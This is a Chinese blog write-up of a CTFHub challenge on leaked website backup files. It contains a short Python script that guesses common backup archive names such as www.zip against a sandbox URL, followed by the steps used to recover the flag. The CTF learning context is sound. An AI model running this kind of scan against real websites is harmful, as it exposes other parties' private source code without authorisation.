CTFHub技能树备份文件下载-----网站源码

最新推荐文章于 2024-02-29 09:00:00 发布
最新推荐文章于 2024-02-29 09:00:00 发布
阅读量297 收藏
点赞数
分类专栏: 网络安全 web安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44360550/article/details/131826922
版权

当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露

在这里插入图片描述
1,python脚本爆破

import requests

url1 = 'http://challenge-5137a91e9f84d298.sandbox.ctfhub.com:10800'		# url为被扫描地址,后不加‘/’

# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar']

for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(requests.get(url).status_code)

3.无论是手动还是用代码,都会直接下载一个压缩包文件,然后解压缩,得到一个用flag命名的文本文档,打开后啥也没有。
在这里插入图片描述
3.既然这样,没有别的办法了,只能把文本文档的名字复制到链接中。回车发现flag
在这里插入图片描述

~樱小路~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
代码文件转UTF-8格式工具
05-22
选择文件夹后自动转换对应的文件编码为UTF-8,多语言代码转换时候经常会使用。部分类型的文件编码判断和转换会出错,请注意先备份文件后再转换进行测试。
CTFHUB《Web-信息泄露-备份文件下载网站码,
weixin_45694388的博客
11-11 1299
三种方法: 方法一:dirsearch扫描git泄露 有文件下载 拿到flag 方法二:御剑(超时10s) 御剑其实也可以扫出来,但是一般我们扫域名超时时间都是三秒,本环境中需要超时10秒才能得到 方法三:burp根据已知字典扫 参考: https://www.cnblogs.com/carr0t/p/websitesource.html ...
CTFHub技能备份文件下载——网站
qq_53768302的博客
04-04 582
CTFHub技能备份文件下载——网站
CTF学习010-备份文件下载
wupeng_ccab的博客
09-17 374
第二种方法:使用Burp抓包,然后把抓取到的信息 发送到Intruder(测试器),因为要获取的网站备份文件是由 文件名称.扩展名 组成,是2个参数,因此攻击类型选择 集束炸弹(Clusterbomb),在GET方法,后设置2个需要攻击的位置,如图。从这个题目的2种解题思路看,这种获取文件的方式,既可以使用目录遍历,也可以使用在GET方法报文头 增加 变量参数的方式获取,当然用GET方法增加报文头的方式仅限于网站根目录适用,如果txt文件不在根目录,你又不知道网站目录结构的情况下,那就抓瞎了。
CTFHub | Web——信息泄露之备份文件下载(网页码、bak文件、vim缓存、DS_store)
2301_76435948的博客
09-28 866
在当前页面网址后面添加 `/.index.php.swp`,会下载一个swp文件, 用能打开二进制文件的软件打开,即可看到flag(我用的是010 Editor,试了一下,IDEA也行,内容翻到最后也能看到flag)
CTFHUB-网站
Web学习之路
11-06 4045
CTFHUB-网站码,四种方法:dirsearch,python,burpsuite,御剑。
备份文件下载 - 网站
weixin_47300936的博客
09-20 289
备份文件下载 - 网站码。常见的网站备份文件后缀。常见的网站备份文件名。
易语言自动备份文件码-易语言
06-13
易语言自动备份文件
商业编程-码-介绍一种数据库远程备份方案.zip
06-23
商业编程-码-介绍一种数据库远程备份方案.zip
inotify-tools-3.14码包
08-25
1. **解压码**:首先,我们需要将下载的`inotify-tools-3.14.tar.gz`压缩包解压。这通常可以通过`tar -zxvf inotify-tools-3.14.tar.gz`命令完成。 2. **进入码目录**:解压后,进入解压出的目录,如`cd ...
易语言文件备份应用码-易语言
06-13
易语言文件备份应用
ctfhub-web-备份下载-网站
最新发布
2301_80162151的博客
02-29 145
给了文件名和后缀,说明就在文件里,直接dirsearch扫描,发现www.zip。直接访问/flag_1197522768.txt,得到flag。
CTFHub-备份文件下载 - 网站
m0_62094846的博客
11-05 356
上面一些是网页文件后缀,下面的是文件名,用他它们排列组合,最终www.zip有文件下载 但三个文件里都没有flag,其中flag文件文件名有点奇怪,输入到网页上
备份文件下载
weixin_57476683的博客
04-15 197
文章目录 一、网站码 开启题目 进入环境 2.1 通过链接进入幻境 2.2 查看题目要求 二、bak文件 三、vim缓存 四、.DS_Store 总结 前言 记录CTFhub备份文件下载 学习过程 (1)网站码 1 开启题目 2 进入环境 2.1 通过链接进入环境 ①下载工具-BurpSuite社区版 ②打开下载的BurpSuite Commouity Edition,开启代理权限(根据图3设置代理服务地址及端口) ③点击Proxy--Intercept-..
CTFHUB 信息泄露题目 备份文件下载(网站码、bak文件、vim缓存、.DS_Store)
bailuy的博客
09-11 2304
CTFHUB 信息泄露题目 备份文件下载1.网站码2.bak文件 1.网站码 当开发人员在线上环境中对代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站码泄露。 我们用dirsearch工具对它扫描一下 在dirsearch文件中打开终端,输入命令 python3 dirsearch.py -u http://challenge-91f1f5e6a791ab02.sandbox.ctfhub.com:10080/ -e * 扫描完之后可以发现有www.zip 我们访问它,
CTFHub技能书解题笔记-信息泄露-备份文件下载-网站
qq_43006864的博客
12-12 731
一、这个题打开, 主页看到这个界面,也就是让我们了解常见的网站码存储方式。 这里大家可以手动去一个个排查,当然这是适合新手朋友,就比如我。 还有一种方法,这里给大家引入一个小脚本,dirsearch。装kali的朋友可以直接用,我是自己搭的Windows攻击机,所以需要单独下载会这个py脚本。 这里我贴上dirsearch的使用效果。很简单 加个参数-u就可跑了 看绿色部分,出来了一个目录,但是没啥用 最好跑出来了个www.zip。试试 弹出了下载界面...
CTFhub】web-信息泄露-备份文件下载-网站码_WriteUp
weixin_45633243的博客
11-04 4712
开启题目 当开发人员在线上环境中对代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站码泄露。 前置知识 常见的网站备份文件后缀 tar tar.gz zip rar 常见的网站备份文件名 web website backup back www wwwroot temp 由此可知,排列组合就可以找到备份文件 解题步骤 手动排列组合 在url的末尾输入类似于 /index.php.bak 逐个尝试直到有下载框 但手动效率很低,并且要注意下载下来里面并没有fl
CTFHub_网站
阿刁〇的博客
04-17 1198
CTFHub_网站码 这里面的四关都需要用到一个web目录扫描器—dirsearch 它是一个基于基于python的命令行工具,能够扫描网页中的目录和文件下载教程:https://blog.csdn.net/weixin_52250313/article/details/115798838?spm=1001.2014.3001.5501 使用dirsearch扫描 首先,我们进入dirsearch的命令行窗口 输入命令:**python3 dirsearch.py -u http://chal
U-Boot码解析龙芯版
11-10
3. **码解析**:深入剖析U-Boot码,包括启动流程、硬件初始化、设备配置、网络支持、存储设备处理等方面,帮助读者理解U-Boot的工作机制。 4. **移植过程**:详述如何将U-Boot移植到龙芯2K1000LA开发板上,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值